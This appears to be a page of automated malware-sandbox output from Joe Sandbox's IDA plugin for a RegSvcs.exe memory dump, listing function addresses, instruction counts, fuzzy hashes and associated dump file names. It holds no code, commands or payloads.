Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f68834dc9a64e2ac8381447c61314e2e1be2982fb71e21d587079f542197b41
Instruction ID: bb91251df695d49c4bc4e0f7e691f1eb5be3261ab51b18182bc8280395c6e816
Opcode Fuzzy Hash: 3f68834dc9a64e2ac8381447c61314e2e1be2982fb71e21d587079f542197b41
Instruction Fuzzy Hash: A061BD71A046499FEB22DFACC880BAEBBB5FF94751F044569E901AF390D778D940C760

Function 01612160 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fef307eed63bbbcdcdf1f12b61042ac703667a2b64553c1e6a247f04177daa0
Instruction ID: 233825503d226f64d0916cc39595d7dcbc50a56651ea31b9e161de5a22f7590f
Opcode Fuzzy Hash: 0fef307eed63bbbcdcdf1f12b61042ac703667a2b64553c1e6a247f04177daa0
Instruction Fuzzy Hash: E7512B71A406099FDB10CFA9CC50BEEBBF5BF48314F29822EE925E7384D374A9419B54

Function 015FEDD3 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af9190e69cbc6c55734a0d1a4e6004e0ec83c1da165be50164b3603356589012
Instruction ID: 0b5cf34692bdad08a5d6a643a895267c99e5ab1d06869afe0506839dac18be24
Opcode Fuzzy Hash: af9190e69cbc6c55734a0d1a4e6004e0ec83c1da165be50164b3603356589012
Instruction Fuzzy Hash: 1D51C171A007429FDB35DF59C885A2BB7F9FB80709F11082EE2028B661D7B4E844CB91

Function 015FCDF0 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
Instruction ID: 9e32cd2e622054822895948f74876c127dad6fdfb2f76f8eb954076a61a6526e
Opcode Fuzzy Hash: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
Instruction Fuzzy Hash: 76515175E0060ADFCF15CF5CC980AEDBBF1FB88210F198569DA25AB340D735A941CB64

Function 015E2CDC Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afd9118cdf70e09c92d1cb42e16ebda423721276f7856000196b32159f2e62b2
Instruction ID: a478917ef0988d583180b6ab709d216fffe6b6f269da32c1a74d2d7147cb1926
Opcode Fuzzy Hash: afd9118cdf70e09c92d1cb42e16ebda423721276f7856000196b32159f2e62b2
Instruction Fuzzy Hash: BC71CD70E04659DFEB2ACF68C5487ADBBF0FB04314F188499D44A9F682C7799986CF50

Function 0160E443 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4f09211d9f43b280ef20a5210680f662da8964fb38a9f4642b6859293c504a70
Instruction ID: f1f8dd5da2c5bbe4c975db628a6bcff1aae6bf23acd079e264d38657f098dc12
Opcode Fuzzy Hash: 4f09211d9f43b280ef20a5210680f662da8964fb38a9f4642b6859293c504a70
Instruction Fuzzy Hash: 3851AA31640A16DFCB26EFA9CD80EABB3F9FF58744F410869E546872A0D732E911CB50

Function 015F45B1 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1f940062bb164c30f98cd5f3406246ca69af4dfd6fb89726bbd0b8788f8d1b5
Instruction ID: b4b7a0ff535bce7eb22cc80e26bce6a1a7261a5fdc01f0921b2d9be73b4a95ae
Opcode Fuzzy Hash: f1f940062bb164c30f98cd5f3406246ca69af4dfd6fb89726bbd0b8788f8d1b5
Instruction Fuzzy Hash: 68517B75E0121AABDF15DF98C840BAFBBB9BF85354F14406DEA01AF250E734DA45CBA0

Function 0165E9E0 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 08e4cd0a40312db3601c2ec88b8b3ba4937567036288613210d62cd3e5d467c2
Instruction ID: ec6a1d0f77f2419896b86111be45d7b317cd437ba3f6061cb137bee495060c4d
Opcode Fuzzy Hash: 08e4cd0a40312db3601c2ec88b8b3ba4937567036288613210d62cd3e5d467c2
Instruction Fuzzy Hash: 7951A471D0020AAFEF619E94CD94BAEFB75AB00325F154669DD12A7290E7329F41CBA0

Function 015EE627 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7069cd10b9e24184e8ca7c13c52fb75de5233d0434c4ebd2eb208ebeafe8a9d
Instruction ID: 73e79b5e8900ed2ead130db56cde48e154edf25815031b8615e31811c6587ecc
Opcode Fuzzy Hash: a7069cd10b9e24184e8ca7c13c52fb75de5233d0434c4ebd2eb208ebeafe8a9d
Instruction Fuzzy Hash: 8541EF729683529BD718DA78D849B6FBBE8FFC8704F04092DFA84DB180E674D904C796

Function 0165CBF0 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0b81a3946f55b75dc5ce2cdda3f80f5b371034855b100ed7acd1836a08236cb
Instruction ID: 25b2dc8347f83f5b3080e8df2874e3d634978a15ca54ceb1ff1a239170d26465
Opcode Fuzzy Hash: a0b81a3946f55b75dc5ce2cdda3f80f5b371034855b100ed7acd1836a08236cb
Instruction Fuzzy Hash: EC517A7290031ADFCB60DFA9CD909AEBBB9FF88358F154619D946A7304D770AD01CB90

Function 0160CC00 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 350191c5167943f642faa9d236a220728ec6817da6fd73e88378c76bc2e14b03
Instruction ID: bae30de0ae577a05f7503e6b83e7f862d0fcd32381b6aef6c059f340c30f3a22
Opcode Fuzzy Hash: 350191c5167943f642faa9d236a220728ec6817da6fd73e88378c76bc2e14b03
Instruction Fuzzy Hash: 7D51B430600207CBEB2F8E6DDD5473B7AA5EB42255F1897ADE906CB391D731C882E752

Function 0160A430 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 788b4b99579bef3be95cf83cb6a5f962717e45401428c8b31908c68a96c8b803
Instruction ID: 6866f9272ab8bd6bdc2ed7d0de5b6b00ff087412042f4cdb22392de4d48e7d6a
Opcode Fuzzy Hash: 788b4b99579bef3be95cf83cb6a5f962717e45401428c8b31908c68a96c8b803
Instruction Fuzzy Hash: 384113716403029FCB2FEFA8DC81B7B776ABB56748F01502DED429B281D7B69810CB95

Function 016001F8 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4eb08891b457c507d59dae0725024faea877c3e57f894922b8e35de0cb1415d3
Instruction ID: 12893713d2d106543c5716c24b61aad13bf85f8449c8dd47c1d964cb3c0fd6c5
Opcode Fuzzy Hash: 4eb08891b457c507d59dae0725024faea877c3e57f894922b8e35de0cb1415d3
Instruction Fuzzy Hash: 9641AD369002169BDB1ADFA8C840BEEB7B5BF48750F14816AF915E7380E7359D41CBA4

Function 015CCDEA Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8ab0bfe8551ae150ada82d30d0611a2094df101d6f205cdec49949029a008a3
Instruction ID: 5fd6d14c43b5dbbe91f7759b1705487438f3a5c8ee2c30d26d11555aa160bfba
Opcode Fuzzy Hash: c8ab0bfe8551ae150ada82d30d0611a2094df101d6f205cdec49949029a008a3
Instruction Fuzzy Hash: 9041F072D00619AADF25DFD8CC80AAFBBB8FF85610F14415EE916F7640D7B49A41CA50

Function 01612750 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e5994e520c12837e1c977685754e7d15b60516a2f9191962b35c18b1936a3e0
Instruction ID: 783759d99dd5d99f4259132085148dee887a17775a38e5749d18b355c43c909d
Opcode Fuzzy Hash: 4e5994e520c12837e1c977685754e7d15b60516a2f9191962b35c18b1936a3e0
Instruction Fuzzy Hash: 7E516A75A41215DFDB15CF98C880AAEF7B2FF84710F2881A9D916EB351D730AE42CB90

Function 015D6154 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9c43ece4d25c6713e78c083beb422a224109535ff8d7f9615a71ee3d78fc157
Instruction ID: 67482b34a8670b270889295d96c7cbc5c6cc6377ec0f6a5e035955af56e95d33
Opcode Fuzzy Hash: e9c43ece4d25c6713e78c083beb422a224109535ff8d7f9615a71ee3d78fc157
Instruction Fuzzy Hash: C451BE709002179FDB39CB6CCC04BA9BBB5FF55314F1482A9E529AB2D1D7749982CB84

Function 015D0BCD Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4e1b5167940caa431c166f8699e9184d512239a2b694f64b378bd6b12a54995
Instruction ID: 3da4bcbc861b8c99da3a5cea5c446640fa15963476de10b42a63d30930aed827
Opcode Fuzzy Hash: b4e1b5167940caa431c166f8699e9184d512239a2b694f64b378bd6b12a54995
Instruction Fuzzy Hash: 9C419E76A006299ACB31DF6CCD40BEAB7B8BF45740F0104A9E908AF291D7749E80CF91

Function 015D0D59 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f917160f502a53b472b858fc79bd34e1d0e4c2c8d51bded4dfe8fa2ee86dfbf4
Instruction ID: 0ca8a7c3f4990c551e593da1dd2849ad6696679cd863309557ea43a5ea92963e
Opcode Fuzzy Hash: f917160f502a53b472b858fc79bd34e1d0e4c2c8d51bded4dfe8fa2ee86dfbf4
Instruction Fuzzy Hash: EB41AF71A007199FEB31DF29CC80B6AB7AAFB95714F04449AF9459B281D7B0ED40CB91

Function 01606F60 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 236dc9f736960bb7b24db1cd5ca7d9d7224a7f821b6a966bf860d08026660abc
Instruction ID: fff4b5266622c4c8e214a203003765517ba661485f5356c9536ffae1feda3559
Opcode Fuzzy Hash: 236dc9f736960bb7b24db1cd5ca7d9d7224a7f821b6a966bf860d08026660abc
Instruction Fuzzy Hash: 64516BB5A00709CFDB16CF69C880B9ABBF2BF49314F14856DD99A9B790D771A900CF50

Function 0164C730 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 406dde0a738e1d3cbee2d677ad83390237ccb169fee05e8e84de92d3e451a913
Instruction ID: 5cb63e295e840f45e5db60f3eb16cac999be3b77937c2995baf2e6946b4189ae
Opcode Fuzzy Hash: 406dde0a738e1d3cbee2d677ad83390237ccb169fee05e8e84de92d3e451a913
Instruction Fuzzy Hash: CC4145B1D0152DAFDB21DA60CC84FDEB77DAB44714F0145E9EA08AB240DB709E89CF98

Function 015D0887 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
